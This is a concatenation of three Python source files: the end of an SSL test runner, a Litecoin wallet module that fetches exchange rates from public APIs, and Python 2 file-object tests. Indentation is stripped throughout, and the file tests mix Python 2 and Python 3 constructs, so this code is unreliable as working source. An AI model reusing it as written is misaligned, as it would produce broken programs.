ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SimpleBackgroundTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
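# A brief illustration of how these precisions are applied (see
# FxThread.ccy_amount_str below): CCY_PRECISIONS.get('JPY', 2) == 0, so a JPY
# amount is formatted with no decimal places, while currencies not listed here
# fall back to the default of 2 decimal places.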
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'}, timeout=10)
return response.json()
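# For example, the Kraken class below effectively calls
# get_json('api.kraken.com', '/0/public/AssetPairs'), which issues a GET to
# https://api.kraken.com/0/public/AssetPairs and returns the decoded JSON body.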
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.daemon = True
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.daemon = True
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
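# The exchange classes below subclass ExchangeBase. Each must implement
# get_rates(ccy); exchanges that also provide historical data override
# history_ccys() and request_history(ccy), as BitcoinAverage and Kraken do.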
class Bit2C(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bit2c.co.il', '/Exchanges/LTCNIS/Ticker.json')
return {'NIS': Decimal(json['ll'])}
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("LTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def request_history(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/LTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['LTC'][r]) for r in json['LTC']
if json['LTC'][r] is not None] # the API sometimes returns null
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def request_history(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=LTC")[ccy +'_LTC']
class Bitfinex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitfinex.com', '/v1/pubticker/ltcusd')
return {'USD': Decimal(json['last_price'])}
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v3/ticker/?book=ltc_mxn')
return {'MXN': Decimal(json['payload']['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/v2/ticker/ltcusd/')
return {'USD': Decimal(json['last'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinbase.com',
'/v2/exchange-rates?currency=LTC')
rates = json['data']['rates']
return dict([(k, Decimal(rates[k])) for k in rates])
class CoinSpot(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.coinspot.com.au', '/pubapi/latest')
return {'AUD': Decimal(json['prices']['ltc']['last'])}
class GoCoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('x.g0cn.com', '/prices')
ltc_prices = json['prices']['LTC']
return dict([(r, Decimal(ltc_prices[r])) for r in ltc_prices])
class HitBTC(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD']
json = self.get_json('api.hitbtc.com', '/api/1/public/LTC%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['last'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
dicts = self.get_json('api.kraken.com', '/0/public/AssetPairs')
pairs = [k for k in dicts['result'] if k.startswith('XLTCZ')]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
ccys = [p[5:] for p in pairs]
result = dict.fromkeys(ccys)
result[ccy] = Decimal(json['result']['XLTCZ'+ccy]['c'][0])
return result
def history_ccys(self):
return ['EUR', 'USD']
def request_history(self, ccy):
query = '/0/public/OHLC?pair=LTC%s&interval=1440' % ccy
json = self.get_json('api.kraken.com', query)
history = json['result']['XLTCZ'+ccy]
return dict([(time.strftime('%Y-%m-%d', time.localtime(t[0])), t[4])
for t in history])
class OKCoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.okcoin.com', '/api/v1/ticker.do?symbol=ltc_usd')
return {'USD': Decimal(json['ticker']['last'])}
class MercadoBitcoin(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('www.mercadobitcoin.net', '/api/ltc/ticker/')
return {'BRL': Decimal(json['ticker']['last'])}
class TheRockTrading(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.therocktrading.com',
'/v1/funds/LTCEUR/ticker')
return {'EUR': Decimal(json['last'])}
class QuadrigaCX(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.quadrigacx.com', '/v2/ticker?book=ltc_cad')
return {'CAD': Decimal(json['last'])}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/ltc_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/ltc_rur')
json_usd = self.get_json('wex.nz', '/api/3/ticker/ltc_usd')
return {'EUR': Decimal(json_eur['ltc_eur']['last']),
'RUB': Decimal(json_rub['ltc_rur']['last']),
'USD': Decimal(json_usd['ltc_usd']['last'])}
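# dictinvert() turns a mapping of exchange -> list of currencies into
# currency -> list of exchanges. Doctest-style sketch (illustrative values):
# >>> dictinvert({'Kraken': ['EUR', 'USD'], 'Bitfinex': ['USD']})
# {'EUR': ['Kraken'], 'USD': ['Kraken', 'Bitfinex']}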
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
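# CURRENCIES maps exchange name -> sorted list of supported currency codes,
# e.g. {'Kraken': ['EUR', 'USD'], ...}; it is loaded from currencies.json when
# available and regenerated by querying each exchange otherwise.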
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
if not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout == 0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, BitcoinAverage)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from .util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
test_file2k.py
|
import sys
import os
import errno
import unittest
import time
from array import array
from weakref import proxy
try:
import threading
except ImportError:
threading = None
from test import support
from test.support import TESTFN, run_unittest
from collections import UserList
class AutoFileTests(unittest.TestCase):
# file tests for which a test file is automatically set up
def setUp(self):
self.f = open(TESTFN, 'wb')
def tearDown(self):
if self.f:
self.f.close()
os.remove(TESTFN)
def testWeakRefs(self):
# verify weak references
p = proxy(self.f)
p.write('teststring')
self.assertEqual(self.f.tell(), p.tell())
self.f.close()
self.f = None
if support.is_jython: # GC is not immediate: borrow a trick
from test_weakref import extra_collect
extra_collect()
self.assertRaises(ReferenceError, getattr, p, 'tell')
def testAttributes(self):
# verify expected attributes exist
f = self.f
with support.check_py3k_warnings():
softspace = f.softspace
f.name # merely shouldn't blow up
f.mode # ditto
f.closed # ditto
with support.check_py3k_warnings():
# verify softspace is writable
f.softspace = softspace # merely shouldn't blow up
# verify the others aren't
for attr in 'name', 'mode', 'closed':
self.assertRaises((AttributeError, TypeError), setattr, f, attr, 'oops')
def testReadinto(self):
# verify readinto
self.f.write('12')
self.f.close()
a = array('c', 'x'*10)
self.f = open(TESTFN, 'rb')
n = self.f.readinto(a)
self.assertEqual('12', a.tostring()[:n])
def testWritelinesUserList(self):
# verify writelines with instance sequence
l = UserList(['1', '2'])
self.f.writelines(l)
self.f.close()
self.f = open(TESTFN, 'rb')
buf = self.f.read()
self.assertEqual(buf, '12')
def testWritelinesIntegers(self):
# verify writelines with integers
self.assertRaises(TypeError, self.f.writelines, [1, 2, 3])
def testWritelinesIntegersUserList(self):
# verify writelines with integers in UserList
l = UserList([1, 2, 3])
self.assertRaises(TypeError, self.f.writelines, l)
def testWritelinesNonString(self):
# verify writelines with non-string object
class NonString:
pass
self.assertRaises(TypeError, self.f.writelines,
[NonString(), NonString()])
def testRepr(self):
# verify repr works
self.assertTrue(repr(self.f).startswith("<open file '" + TESTFN))
# see issue #14161
if sys.platform == "win32" or (support.is_jython and os._name == "nt"):
# Windows doesn't like \r\n\t" in the file name, but ' is ok
fname = "xx'xx"
else:
fname = 'xx\rxx\nxx\'xx"xx'
with open(fname, 'w') as f:
self.addCleanup(os.remove, fname)
self.assertTrue(repr(f).startswith(
"<open file %r, mode 'w' at" % fname))
def testErrors(self):
self.f.close()
self.f = open(TESTFN, 'rb')
f = self.f
self.assertEqual(f.name, TESTFN)
self.assertTrue(not f.isatty())
self.assertTrue(not f.closed)
self.assertRaises(TypeError, f.readinto, "")
f.close()
self.assertTrue(f.closed)
def testMethods(self):
methods = ['fileno', 'flush', 'isatty', 'next', 'read', 'readinto',
'readline', 'readlines', 'seek', 'tell', 'truncate',
'write', '__iter__']
deprecated_methods = ['xreadlines']
if sys.platform.startswith('atheos'):
methods.remove('truncate')
# __exit__ should close the file
self.f.__exit__(None, None, None)
self.assertTrue(self.f.closed)
for methodname in methods:
method = getattr(self.f, methodname)
# should raise on closed file
self.assertRaises((TypeError, ValueError), method)
with support.check_py3k_warnings():
for methodname in deprecated_methods:
method = getattr(self.f, methodname)
self.assertRaises(ValueError, method)
self.assertRaises(ValueError, self.f.writelines, [])
# file is closed, __exit__ shouldn't do anything
self.assertEqual(self.f.__exit__(None, None, None), None)
# it must also return None if an exception was given
try:
1 // 0
except:
self.assertEqual(self.f.__exit__(*sys.exc_info()), None)
def testReadWhenWriting(self):
self.assertRaises(IOError, self.f.read)
def testNastyWritelinesGenerator(self):
def nasty():
for i in range(5):
if i == 3:
self.f.close()
yield str(i)
self.assertRaises(ValueError, self.f.writelines, nasty())
def testIssue5677(self):
# We don't use the already-open file.
self.f.close()
# Remark: Do not perform more than one test per open file,
# since that does NOT catch the readline error on Windows.
data = 'xxx'
for mode in ['w', 'wb', 'a', 'ab']:
for attr in ['read', 'readline', 'readlines']:
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, getattr(self.f, attr))
self.f.close()
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, lambda: [line for line in self.f])
self.f.close()
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, self.f.readinto, bytearray(len(data)))
self.f.close()
for mode in ['r', 'rb', 'U', 'Ub', 'Ur', 'rU', 'rbU', 'rUb']:
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.write, data)
self.f.close()
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.writelines, [data, data])
self.f.close()
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.truncate)
self.f.close()
class OtherFileTests(unittest.TestCase):
def setUp(self):
# (Jython addition) track open file so we can clean up
self.f = None
self.filename = TESTFN
def tearDown(self):
# (Jython addition) clean up to prevent errors cascading
if self.f:
self.f.close()
try:
os.remove(self.filename)
except EnvironmentError as ee:
if ee.errno != errno.ENOENT:
raise ee
def testOpenDir(self):
this_dir = os.path.dirname(__file__) or os.curdir
for mode in (None, "w"):
try:
if mode:
self.f = open(this_dir, mode)
else:
self.f = open(this_dir)
except IOError as e:
self.assertEqual(e.filename, this_dir)
else:
self.fail("opening a directory didn't raise an IOError")
def testModeStrings(self):
# check invalid mode strings
for mode in ("", "aU", "wU+"):
try:
self.f = f = open(TESTFN, mode)
except ValueError:
pass
else:
f.close()
self.fail('%r is an invalid file mode' % mode)
# Some invalid modes fail on Windows, but pass on Unix
# Issue3965: avoid a crash on Windows when filename is unicode
for name in (TESTFN, str(TESTFN), str(TESTFN + '\t')):
try:
self.f = f = open(name, "rr")
except (IOError, ValueError):
pass
else:
f.close()
def testStdin(self):
# This causes the interpreter to exit on OSF1 v5.1.
if sys.platform != 'osf1V5':
self.assertRaises(IOError, sys.stdin.seek, -1)
else:
print((
' Skipping sys.stdin.seek(-1), it may crash the interpreter.'
' Test manually.'), file=sys.__stdout__)
self.assertRaises(IOError, sys.stdin.truncate)
def testUnicodeOpen(self):
# verify repr works for unicode too
self.f = f = open(str(TESTFN), "w")
self.assertTrue(repr(f).startswith("<open file u'" + TESTFN))
f.close()
os.unlink(TESTFN)
def testBadModeArgument(self):
# verify that we get a sensible error message for bad mode argument
bad_mode = "qwerty"
try:
self.f = f = open(TESTFN, bad_mode)
except ValueError as msg:
if msg.args[0] != 0:
s = str(msg)
if TESTFN in s or bad_mode not in s:
self.fail("bad error message for invalid mode: %s" % s)
# if msg.args[0] == 0, we're probably on Windows where there may
# be no obvious way to discover why open() failed.
else:
f.close()
self.fail("no error for invalid mode: %s" % bad_mode)
def testSetBufferSize(self):
# make sure that explicitly setting the buffer size doesn't cause
# misbehaviour especially with repeated close() calls
for s in (-1, 0, 1, 512):
try:
self.f = f = open(TESTFN, 'w', s)
f.write(str(s))
f.close()
f.close()
self.f = f = open(TESTFN, 'r', s)
d = int(f.read())
f.close()
f.close()
except IOError as msg:
self.fail('error setting buffer size %d: %s' % (s, str(msg)))
self.assertEqual(d, s)
def testTruncateOnWindows(self):
def bug801631():
# SF bug <http://www.python.org/sf/801631>
# "file.truncate fault on windows"
self.f = f = open(TESTFN, 'wb')
f.write('12345678901') # 11 bytes
f.close()
self.f = f = open(TESTFN, 'rb+')
data = f.read(5)
if data != '12345':
self.fail("Read on file opened for update failed %r" % data)
if f.tell() != 5:
self.fail("File pos after read wrong %d" % f.tell())
f.truncate()
if f.tell() != 5:
self.fail("File pos after ftruncate wrong %d" % f.tell())
f.close()
size = os.path.getsize(TESTFN)
if size != 5:
self.fail("File size after ftruncate wrong %d" % size)
try:
bug801631()
finally:
os.unlink(TESTFN)
@unittest.skipIf(support.is_jython, "Specific to CPython")
def testIteration(self):
# Test the complex interaction when mixing file-iteration and the
# various read* methods. Ostensibly, the mixture could just be tested
# to work when it should work according to the Python language,
# instead of fail when it should fail according to the current CPython
# implementation. People don't always program Python the way they
# should, though, and the implementation might change in subtle ways,
# so we explicitly test for errors, too; the test will just have to
# be updated when the implementation changes.
dataoffset = 16384
filler = "ham\n"
assert not dataoffset % len(filler), \
"dataoffset must be multiple of len(filler)"
nchunks = dataoffset // len(filler)
testlines = [
"spam, spam and eggs\n",
"eggs, spam, ham and spam\n",
"saussages, spam, spam and eggs\n",
"spam, ham, spam and eggs\n",
"spam, spam, spam, spam, spam, ham, spam\n",
"wonderful spaaaaaam.\n"
]
methods = [("readline", ()), ("read", ()), ("readlines", ()),
("readinto", (array("c", " "*100),))]
try:
# Prepare the testfile
bag = open(TESTFN, "w")
bag.write(filler * nchunks)
bag.writelines(testlines)
bag.close()
# Test for appropriate errors mixing read* and iteration
for methodname, args in methods:
self.f = f = open(TESTFN)
if next(f) != filler:
self.fail, "Broken testfile"
meth = getattr(f, methodname)
try:
meth(*args)
except ValueError:
pass
else:
self.fail("%s%r after next() didn't raise ValueError" %
(methodname, args))
f.close()
# Test to see if harmless (by accident) mixing of read* and
# iteration still works. This depends on the size of the internal
# iteration buffer (currently 8192,) but we can test it in a
# flexible manner. Each line in the bag o' ham is 4 bytes
# ("h", "a", "m", "\n"), so 4096 lines of that should get us
# exactly on the buffer boundary for any power-of-2 buffersize
# between 4 and 16384 (inclusive).
self.f = f = open(TESTFN)
for i in range(nchunks):
next(f)
testline = testlines.pop(0)
try:
line = f.readline()
except ValueError:
self.fail("readline() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("readline() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
buf = array("c", "\x00" * len(testline))
try:
f.readinto(buf)
except ValueError:
self.fail("readinto() after next() with supposedly empty "
"iteration-buffer failed anyway")
line = buf.tostring()
if line != testline:
self.fail("readinto() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
try:
line = f.read(len(testline))
except ValueError:
self.fail("read() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("read() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
try:
lines = f.readlines()
except ValueError:
self.fail("readlines() after next() with supposedly empty "
"iteration-buffer failed anyway")
if lines != testlines:
self.fail("readlines() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
# Reading after iteration hit EOF shouldn't hurt either
self.f = f = open(TESTFN)
try:
for line in f:
pass
try:
f.readline()
f.readinto(buf)
f.read()
f.readlines()
except ValueError:
self.fail("read* failed after next() consumed file")
finally:
f.close()
finally:
os.unlink(TESTFN)
@unittest.skipUnless(support.is_jython, "Applicable to Jython")
def testIterationMixes(self):
# And now for something completely different. An implementation where
# various read* methods mix happily with iteration over the lines of
# a file using next().
sheep = [
"It's my belief that these sheep\n",
"are labouring under the\n",
"mis-apprehension that they're birds.\n",
"Now witness their attempts\n",
"to fly from tree to tree.\n",
"Notice that they do not so much fly\n",
"as plummet.\n"
]
# Prepare the testfile
self.f = f = open(TESTFN, "w")
f.writelines(sheep)
f.close()
# Test for appropriate results mixing read* and iteration
self.f = f = open(TESTFN)
self.assertEqual(next(f), sheep[0])
self.assertEqual(f.readline(), sheep[1])
self.assertEqual(next(f), sheep[2])
self.assertEqual(f.read(5), sheep[3][:5])
r = array('c', "1234567")
f.readinto(r)
self.assertEqual(r, array('c', sheep[3][5:12]))
self.assertEqual(next(f), sheep[3][12:])
r = f.readlines()
self.assertEqual(r, sheep[4:])
self.assertRaises(StopIteration, f.__next__)
f.close()
class FileSubclassTests(unittest.TestCase):
def testExit(self):
# test that exiting with context calls subclass' close
class C(file):
def __init__(self, *args):
self.subclass_closed = False
file.__init__(self, *args)
def close(self):
self.subclass_closed = True
file.close(self)
with C(TESTFN, 'w') as f:
pass
self.assertTrue(f.subclass_closed)
@unittest.skipUnless(threading, 'Threading required for this test.')
class FileThreadingTests(unittest.TestCase):
# These tests check the ability to call various methods of file objects
# (including close()) concurrently without crashing the Python interpreter.
# See #815646, #595601
# Modified for Jython so that each worker thread holds *and closes* its own
# file object, since we cannot rely on immediate garbage collection closing
# files. (Open file objects prevent deletion of TESTFN on Windows at least.)
def setUp(self):
self._threads = support.threading_setup()
self.filename = TESTFN
self.exc_info = None
with open(self.filename, "w") as f:
f.write("\n".join("0123456789"))
self._count_lock = threading.Lock()
self.close_count = 0
self.close_success_count = 0
self.use_buffering = False
def tearDown(self):
try:
os.remove(self.filename)
except EnvironmentError as ee:
# (Jython addition) detect failure common on Windows, on missing
# close, that creates spurious errors in subsequent tests.
if ee.errno != errno.ENOENT:
raise ee
support.threading_cleanup(*self._threads)
def _create_file(self):
if self.use_buffering:
return open(self.filename, "w+", buffering=1024*16)
else:
return open(self.filename, "w+")
def _close_file(self, f):
with self._count_lock:
self.close_count += 1
f.close()
with self._count_lock:
self.close_success_count += 1
# Close one file object and return a new one
def _close_and_reopen_file(self, f):
self._close_file(f)
return self._create_file()
def _run_workers(self, func, nb_workers, duration=0.2):
with self._count_lock:
self.close_count = 0
self.close_success_count = 0
self.do_continue = True
threads = []
try:
for i in range(nb_workers):
t = threading.Thread(target=func)
t.start()
threads.append(t)
for _ in range(100):
time.sleep(duration/100)
with self._count_lock:
if self.close_count-self.close_success_count > nb_workers+1:
if support.verbose:
print('Q', end=' ')
break
time.sleep(duration)
finally:
self.do_continue = False
for t in threads:
t.join()
def _test_close_open_io(self, io_func, nb_workers=5):
def worker():
# Each worker has its own currently open file object
myfile = None
try:
myfile = self._create_file()
while self.do_continue:
io_func(myfile)
myfile = self._close_and_reopen_file(myfile)
except Exception as e:
# Stop the test (other threads) and remember why
self.do_continue = False
self.exc_info = sys.exc_info()
# Finally close the last file object
if myfile:
self._close_file(myfile)
self._run_workers(worker, nb_workers)
if self.exc_info:
# Some worker saved an exception: re-raise it now
raise self.exc_info[0](self.exc_info[1]).with_traceback(self.exc_info[2])
if support.verbose:
# Useful verbose statistics when tuning this test to take
# less time to run while ensuring that it is still useful.
#
# the percent of close calls that raised an error
percent = 100.
if self.close_count > 0:
percent -= 100.*self.close_success_count/self.close_count
print(self.close_count, ('%.4f ' % percent), end=' ')
# Each test function defines an operation on the worker's file object
def test_close_open(self):
def io_func(f):
pass
self._test_close_open_io(io_func)
def test_close_open_flush(self):
def io_func(f):
f.flush()
self._test_close_open_io(io_func)
def test_close_open_iter(self):
def io_func(f):
list(iter(f))
self._test_close_open_io(io_func)
def test_close_open_isatty(self):
def io_func(f):
f.isatty()
self._test_close_open_io(io_func)
def test_close_open_print(self):
def io_func(f):
print('', file=f)
self._test_close_open_io(io_func)
def test_close_open_print_buffered(self):
self.use_buffering = True
def io_func(f):
print('', file=f)
self._test_close_open_io(io_func)
def test_close_open_read(self):
def io_func(f):
f.read(0)
self._test_close_open_io(io_func)
def test_close_open_readinto(self):
def io_func(f):
a = array('c', 'xxxxx')
f.readinto(a)
self._test_close_open_io(io_func)
def test_close_open_readline(self):
def io_func(f):
f.readline()
self._test_close_open_io(io_func)
def test_close_open_readlines(self):
def io_func(f):
f.readlines()
self._test_close_open_io(io_func)
def test_close_open_seek(self):
def io_func(f):
f.seek(0, 0)
self._test_close_open_io(io_func)
def test_close_open_tell(self):
def io_func(f):
f.tell()
self._test_close_open_io(io_func)
def test_close_open_truncate(self):
def io_func(f):
f.truncate()
self._test_close_open_io(io_func)
def test_close_open_write(self):
def io_func(f):
f.write('')
self._test_close_open_io(io_func)
def test_close_open_writelines(self):
def io_func(f):
f.writelines('')
self._test_close_open_io(io_func)
class StdoutTests(unittest.TestCase):
def test_move_stdout_on_write(self):
# Issue 3242: sys.stdout can be replaced (and freed) during a
# print statement; prevent a segfault in this case
save_stdout = sys.stdout
class File:
def write(self, data):
if '\n' in data:
sys.stdout = save_stdout
try:
sys.stdout = File()
print("some text")
finally:
